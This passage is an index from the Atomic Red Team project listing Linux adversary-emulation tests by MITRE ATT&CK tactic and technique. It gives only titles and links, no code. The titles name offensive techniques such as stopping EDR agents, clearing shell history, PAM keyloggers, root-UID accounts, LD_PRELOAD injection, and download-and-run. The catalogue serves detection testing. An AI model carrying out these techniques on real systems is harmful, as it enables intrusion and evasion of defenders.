- T1070 Indicator Removal on Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.004 Masquerading: Masquerade Task or Service](../../T1036.004/T1036.004.md)
- Atomic Test #3: linux rename /proc/pid/comm using prctl [linux]
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1562.010 Downgrade Attack [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1480 Execution Guardrails [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.002 Hide Artifacts: Hidden Users [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.003 Impair Defenses: HISTCONTROL](../../T1562.003/T1562.003.md)
- Atomic Test #1: Disable history collection [linux, macos]
- Atomic Test #2: Mac HISTCONTROL [macos, linux]
- Atomic Test #3: Clear bash history [linux]
- Atomic Test #4: Setting the HISTCONTROL environment variable [linux]
- Atomic Test #5: Setting the HISTFILESIZE environment variable [linux]
- Atomic Test #6: Setting the HISTFILE environment variable [linux]
- Atomic Test #7: Setting the HISTIGNORE environment variable [linux]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1562.001 Impair Defenses: Disable or Modify Tools](../../T1562.001/T1562.001.md)
- Atomic Test #1: Disable syslog [linux]
- Atomic Test #2: Disable Cb Response [linux]
- Atomic Test #3: Disable SELinux [linux]
- Atomic Test #4: Stop Crowdstrike Falcon on Linux [linux]
- Atomic Test #38: Clear History [linux]
- Atomic Test #39: Suspend History [linux]
- Atomic Test #40: Reboot Linux Host via Kernel System Request [linux]
- Atomic Test #41: Clear Pagging Cache [linux]
- Atomic Test #42: Disable Memory Swap [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.005 Indicator Removal from Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027 Obfuscated Files or Information](../../T1027/T1027.md)
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.006 Run Virtual Instance [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1553 Subvert Trust Controls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.003 Masquerading: Rename System Utilities](../../T1036.003/T1036.003.md)
- Atomic Test #2: Masquerading as Linux crond process. [linux]
- T1562.011 Spoof Security Alerting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.003 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1553.004 Subvert Trust Controls: Install Root Certificate](../../T1553.004/T1553.004.md)
- Atomic Test #1: Install root CA on CentOS/RHEL [linux]
- Atomic Test #2: Install root CA on Debian/Ubuntu [linux]
- [T1027.004 Obfuscated Files or Information: Compile After Delivery](../../T1027.004/T1027.004.md)
- Atomic Test #3: C compile [linux, macos]
- Atomic Test #4: CC compile [linux, macos]
- Atomic Test #5: Go compile [linux, macos]
- T1564.007 VBA Stomping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1564.003 Hide Artifacts: Hidden Window [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.009 Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1070.009 Clear Persistence [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1146 Clear Command History [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.006 HTML Smuggling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1027.010 Command Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1130 Install Root Certificate [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1070.004 Indicator Removal on Host: File Deletion](../../T1070.004/T1070.004.md)
- Atomic Test #1: Delete a single file - Linux/macOS [linux, macos]
- Atomic Test #2: Delete an entire folder - Linux/macOS [linux, macos]
- Atomic Test #3: Overwrite and delete a file with shred [linux]
- Atomic Test #8: Delete Filesystem - Linux [linux]
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1027.002 Obfuscated Files or Information: Software Packing](../../T1027.002/T1027.002.md)
- Atomic Test #1: Binary simply packed by UPX (linux) [linux]
- Atomic Test #2: Binary packed by UPX, with modified headers (linux) [linux]
- T1564.005 Hidden File System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1151 Space after Filename [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1036.006 Masquerading: Space after Filename](../../T1036.006/T1036.006.md)
- Atomic Test #2: Space After Filename [macos, linux]
- T1055.008 Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1564.001 Hide Artifacts: Hidden Files and Directories](../../T1564.001/T1564.001.md)
- Atomic Test #1: Create a hidden file in a hidden directory [linux, macos]
- T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
- T1211 Exploitation for Defense Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1156 Malicious Shell Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.003 Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md)
- Atomic Test #1: Malicious PAM rule [linux]
- Atomic Test #2: Malicious PAM module [linux]
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1501 Systemd Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1133 External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1505.002 Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.003 Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #1: Create a user account on a Linux system [linux]
- Atomic Test #5: Create a new user in Linux with `root` UID and GID. [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1098.004 SSH Authorized Keys](../../T1098.004/T1098.004.md)
- Atomic Test #1: Modify SSH Authorized Keys [macos, linux]
- T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1136.002 Create Account: Domain Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.006 Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md)
- Atomic Test #1: Linux - Load Kernel Module via insmod [linux]
- [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md)
- Atomic Test #1: Create Systemd Service and Timer [linux]
- Atomic Test #2: Create a user level transient systemd service and timer [linux]
- Atomic Test #3: Create a system level transient systemd service and timer [linux]
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1154 Trap [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546 Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.004 Event Triggered Execution: .bash_profile and .bashrc](../../T1546.004/T1546.004.md)
- Atomic Test #1: Add command to .bash_profile [macos, linux]
- Atomic Test #2: Add command to .bashrc [macos, linux]
- Atomic Test #3: Append to the system shell profile [linux]
- Atomic Test #4: Append commands user shell profile [linux]
- Atomic Test #5: System shell profile scripts [linux]
- Atomic Test #6: Create/Append to .bash_logout [linux]
- T1168 Local Job Scheduling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1166 Setuid and Setgid [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505 Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1546.016 Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1158 Hidden Files and Directories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1037.004 Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md)
- Atomic Test #2: rc.common [linux]
- Atomic Test #3: rc.local [linux]
- [T1543.002 Create or Modify System Process: Systemd Service](../../T1543.002/T1543.002.md)
- Atomic Test #1: Create Systemd Service [linux]
- Atomic Test #2: Create Systemd Service file, Enable the service , Modify and Reload the service. [linux]
- T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1547.013 XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #2: At - Schedule a job [linux]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.001 SQL Stored Procedures [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #8: Create local account (Linux) [linux]
- Atomic Test #9: Reactivate a locked/expired account (Linux) [linux]
- Atomic Test #10: Login as nobody (Linux) [linux]
# command-and-control
- T1205.002 Socket Filters [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1132.001 Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md)
- Atomic Test #1: Base64 Encoded data. [macos, linux]
- T1568.002 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.004 Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1172 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.001 Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.001 Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071 Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1219 Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1572 Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1483 Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.003 Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.002 External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090 Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568 Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1188 Multi-hop Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102 Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1568.003 DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1104 Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1071.002 File Transfer Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.003 One-Way Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.003 Proxy: Multi-hop Proxy](../../T1090.003/T1090.003.md)
- Atomic Test #3: Tor Proxy Usage - Debian/Ubuntu [linux]
- T1001 Data Obfuscation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1571 Non-Standard Port](../../T1571/T1571.md)
- Atomic Test #2: Testing usage of uncommonly used port [linux, macos]
- T1573 Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.002 Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1573.002 Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1095 Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.003 Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1065 Uncommonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1090.004 Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132 Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1132.002 Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1071.001 Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md)
- Atomic Test #3: Malicious User Agents - Nix [linux, macos]
- [T1105 Ingress Tool Transfer](../../T1105/T1105.md)
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
- Atomic Test #3: scp remote file copy (push) [linux, macos]
- Atomic Test #4: scp remote file copy (pull) [linux, macos]
- Atomic Test #5: sftp remote file copy (push) [linux, macos]
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
- Atomic Test #14: whois file download [linux, macos]
- Atomic Test #27: Linux Download File and Run [linux]
- T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
- Atomic Test #1: Connection Proxy [macos, linux]
- T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1102.001 Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1001.001 Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# collection
- [T1560.001 Archive Collected Data: Archive via Utility](../../T1560.001/T1560.001.md)
- Atomic Test #5: Data Compressed - nix - zip [linux, macos]
- Atomic Test #6: Data Compressed - nix - gzip Single File [linux, macos]
- Atomic Test #7: Data Compressed - nix - tar Folder or File [linux, macos]
- Atomic Test #8: Data Encrypted with zip and gpg symmetric [macos, linux]
- Atomic Test #9: Encrypts collected data with AES-256 and Base64 [linux, macos]
- [T1113 Screen Capture](../../T1113/T1113.md)
- Atomic Test #3: X Windows Capture [linux]
- Atomic Test #4: Capture Linux Desktop using Import Tool [linux]
- T1557 Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.001 Input Capture: Keylogging](../../T1056.001/T1056.001.md)
- Atomic Test #2: Living off the land Terminal Input Capture on Linux with pam.d [linux]
- Atomic Test #3: Logging bash history to syslog [linux]
- Atomic Test #4: Bash session based keylogger [linux]
- Atomic Test #5: SSHD PAM keylogger [linux]
- Atomic Test #6: Auditd keylogger [linux]
- T1123 Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1560.003 Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114 Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1074.001 Data Staged: Local Data Staging](../../T1074.001/T1074.001.md)
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
- T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1115 Clipboard Data](../../T1115/T1115.md)
- Atomic Test #5: Add or copy content to clipboard with xClip [linux]
- T1074.002 Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1005 Data from Local System [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1560.002 Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md)
- Atomic Test #1: Compressing data using GZip in Python (Linux) [linux]
- Atomic Test #2: Compressing data using bz2 in Python (Linux) [linux]
- Atomic Test #3: Compressing data using zipfile in Python (Linux) [linux]
- Atomic Test #4: Compressing data using tarfile in Python (Linux) [linux]
- T1560 Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.003 DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1125 Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1114.003 Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1074 Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056.002 Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# lateral-movement
- T1021.005 VNC [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1080 Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021.004 SSH [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1017 Application Deployment Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563.001 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1021 Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1563 Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1072 Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1210 Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1534 Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1570 Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1184 SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# privilege-escalation
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.003 Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md)
- Atomic Test #1: Sudo usage [macos, linux]
- Atomic Test #2: Unlimited sudo cache timeout [macos, linux]
- Atomic Test #3: Disable tty_tickets for sudo caching [macos, linux]
- T1547 Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1206 Sudo Caching [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1053.003 Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md)
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
- Atomic Test #2: Cron - Add script to all cron subfolders [macos, linux]
- Atomic Test #3: Cron - Add script to /var/spool/cron/crontabs/ folder [linux]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055 Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1611 Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.001 Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.005 Event Triggered Execution: Trap](../../T1546.005/T1546.005.md)
- Atomic Test #1: Trap EXIT [macos, linux]
- Atomic Test #2: Trap SIGINT [macos, linux]
- [T1574.006 Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md)
- Atomic Test #1: Shared Library Injection via /etc/ld.so.preload [linux]
- Atomic Test #2: Shared Library Injection via LD_PRELOAD [linux]
- T1053.001 At (Linux) [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1548 Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1548.001 Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md)
- Atomic Test #1: Make and modify binary from C source [macos, linux]
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
- Atomic Test #3: Set a SetGID flag on file [macos, linux]
- Atomic Test #4: Make and modify capabilities of a binary [linux]
- Atomic Test #5: Provide the SetUID capability to a file [linux]
- Atomic Test #6: Do reconnaissance for files that have the setuid bit set [linux]
- Atomic Test #7: Do reconnaissance for files that have the setgid bit set [linux]
- T1055.014 VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1169 Sudo [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
